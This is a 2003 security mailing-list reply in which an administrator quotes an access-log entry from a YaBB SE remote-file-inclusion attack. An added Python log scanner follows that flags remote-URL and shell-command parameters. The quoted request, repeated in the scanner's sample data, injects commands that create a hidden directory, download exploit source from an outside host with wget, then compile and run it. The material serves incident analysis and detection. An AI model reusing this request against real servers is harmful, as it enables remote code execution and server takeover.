Re: [cobalt-security] Compromised Box
- Subject: Re: [cobalt-security] Compromised Box
- From: Jeroen Wunnink <jeroen@xxxxxxxxxxxxxx>
- Date: Mon, 24 Mar 2003 10:11:14 +0100
- List-id: Mailing list for users to address network security on Cobalt products. <cobalt-security.list.cobalt.com>
These tend to be files executed by hackers due to exploits in sites.
I've had one this weekend too; a hacker used an exploit in yabbse in this way:
<hidden> - - [22/Mar/2003:15:46:15 +0100] "GET /yabbse/Sources/Packages.php?sourcedir=http://lesl13.hpg.com.br/cmd.txt?&cmd=md=mkdir%20/var/tmp/.xpl;%20cd%20/var/tmp/.xpl;%20wget%20www.lesl13.hpg.com.br/dsl.c;%20gcc%20-o%20dsl%20dsl.c;%20./dsl HTTP/1.1" 200 318 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows 98)"
Thus I had a ./dsl script running as user httpd, which actually opened up a terminal for hackers.
At 01:28 PM 3/20/2003 -0800, Nathan Kondra wrote:
I have found a weird file on my box. It is a RaQ 4i; the file was ./sushi.
It is attached. I believe that I have been rooted somehow and this file is
the key. Can anyone help me figure out what the hell this thing is and what
it has been doing to my system?
Nathan Kondra
PS: If needed I can attach the file.
_______________________________________________
cobalt-security mailing list
cobalt-security@xxxxxxxxxxxxxxx
http://list.cobalt.com/mailman/listinfo/cobalt-security
Kind regards,
Jeroen Wunnink,
systeembeheer@xxxxxxxxxxxxxx
telephone: +31 (035) 6285455
fax: +31 (035) 6838242
P.O. Box 1332, 1200 BH Hilversum
http://www.easyhosting.nl
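The access-log entry Jeroen quoted has two shapes a defender can look for in web-server logs without knowing the specific script: a query parameter whose value is itself a URL (the remote-file-inclusion pattern that made Packages.php fetch cmd.txt), and a parameter whose decoded value is a chain of shell commands (mkdir, wget, gcc, ./dsl, separated by ';'). The script below is an added example, not code from the list post or from Cobalt; it parses Apache combined-format lines, URL-decodes each query parameter, and flags those two shapes. The indicator lists, the 203.0.113.x source addresses standing in for the hidden one, and the second (benign) log line are constructed assumptions for the example.

```python
import re
from urllib.parse import unquote

# Apache "combined" log line: host ident authuser [time] "request" status bytes "referer" "agent"
LOG_RE = re.compile(
    r'^(?P<host>\S+) \S+ \S+ \[(?P<time>[^\]]+)\] "(?P<request>[^"]*)" '
    r'(?P<status>\d{3}) (?P<size>\S+)'
)

# Indicator lists are assumptions chosen for this example, not taken from the list post.
REMOTE_SCHEMES = ("http://", "https://", "ftp://")
SHELL_TOKENS = ("wget ", "curl ", "gcc ", "mkdir ", "chmod ", "/tmp/", ";")


def parse_request(line):
    """Split one access-log line into host, timestamp, method, target and status."""
    m = LOG_RE.match(line)
    if not m:
        return None
    fields = m.group("request").split()
    if len(fields) < 2:
        return None
    return {"host": m.group("host"), "time": m.group("time"),
            "method": fields[0], "target": fields[1], "status": int(m.group("status"))}


def query_params(target):
    """Yield (name, decoded value) for each key=value pair after the first '?'.
    Splits on '&' only, so a ';' inside a value stays part of that value."""
    query = target.partition("?")[2]
    for pair in query.split("&"):
        if not pair:
            continue
        name, _, raw = pair.partition("=")
        yield name, unquote(raw)


def inspect_params(target):
    """Return one finding per parameter that carries a remote URL (the RFI shape)
    or several tokens that only make sense as an injected shell command."""
    findings = []
    for name, value in query_params(target):
        stripped = value.strip().lower()
        if stripped.startswith(REMOTE_SCHEMES):
            findings.append({"param": name, "reason": "remote URL as parameter value"})
            continue
        hits = [tok for tok in SHELL_TOKENS if tok in stripped]
        if len(hits) >= 2:  # a single token (e.g. a lone ';') is too noisy on its own
            findings.append({"param": name,
                             "reason": "shell command tokens: " + ", ".join(h.strip() for h in hits)})
    return findings


def scan_log(lines):
    """Return one alert per request whose query string produced at least one finding."""
    alerts = []
    for line in lines:
        req = parse_request(line)
        if req is None:
            continue
        findings = inspect_params(req["target"])
        if findings:
            alerts.append({"host": req["host"], "time": req["time"],
                           "path": req["target"].partition("?")[0],
                           "status": req["status"], "findings": findings})
    return alerts


# Constructed sample: line 1 is the request from the list post with a documentation-range
# address in place of the hidden one; line 2 is an ordinary forum request for contrast.
SAMPLE_LOG = [
    '203.0.113.7 - - [22/Mar/2003:15:46:15 +0100] "GET /yabbse/Sources/Packages.php'
    '?sourcedir=http://lesl13.hpg.com.br/cmd.txt?&cmd=md=mkdir%20/var/tmp/.xpl;%20cd%20'
    '/var/tmp/.xpl;%20wget%20www.lesl13.hpg.com.br/dsl.c;%20gcc%20-o%20dsl%20dsl.c;%20./dsl'
    ' HTTP/1.1" 200 318 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows 98)"',
    '203.0.113.9 - - [22/Mar/2003:15:50:01 +0100] "GET /yabbse/index.php?board=3&action='
    'display&threadid=42 HTTP/1.1" 200 5120 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows 98)"',
]

if __name__ == "__main__":
    for alert in scan_log(SAMPLE_LOG):
        print(alert["time"], alert["host"], alert["path"], "status", alert["status"])
        for f in alert["findings"]:
            print("   ", f["param"], "->", f["reason"])
```

Run against the two sample lines it reports only the Packages.php request, with the sourcedir parameter flagged as a remote URL and the cmd parameter flagged for its command tokens. A 200 status on such a request, as in the quoted entry, is the cue to check the web server's user for unexpected processes and hidden directories under /var/tmp, which is where the dsl binary ended up in Jeroen's case.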